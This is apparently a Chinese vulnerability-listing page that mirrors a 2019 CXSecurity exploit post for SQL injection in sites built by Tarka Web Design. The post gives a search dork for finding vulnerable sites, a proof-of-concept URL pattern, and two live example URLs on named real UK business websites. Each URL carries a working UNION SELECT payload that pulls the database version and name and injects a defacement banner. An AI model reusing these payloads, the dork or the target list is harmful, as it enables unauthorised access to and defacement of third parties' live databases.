Tarka Web Design SQLi - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1598185 漏洞类型
发布时间 2019-05-07 更新时间 2019-05-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050062
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# [+] Title  : Tarka Web Design SQLi 
# [+] Author [Founder] : ABDO10
# [+] Date : May, 7th 2019
# [+] Dork : "php?ID=" "Developed by Tarka Web Design"

# [+] Poc : 
  [target]/file.php?ID=1[payload]

# [+] Alive E.g : 
  [+] http://www.darracottdesigns.co.uk/SingleService.php?ID=-2%27union+select+1,group_concat(0x3C68313E3C666F6E7420636F6C6F723D22726564223E207E496E6A6563746564204279204142444F31307E203C2F666F6E743E3C2F68313E,@@version,0x3a,database()),3,4--%20-

  [+] http://hicastle-recruitment.co.uk/SingleVacancy.php?ID=-42%27union+select+1,group_concat(0x3C68313E3C666F6E7420636F6C6F723D22726564223E207E496E6A6563746564204279204142444F31307E203C2F666F6E743E3C2F68313E,@@version,0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20-

# [+] Greetings ./Lakarha_Family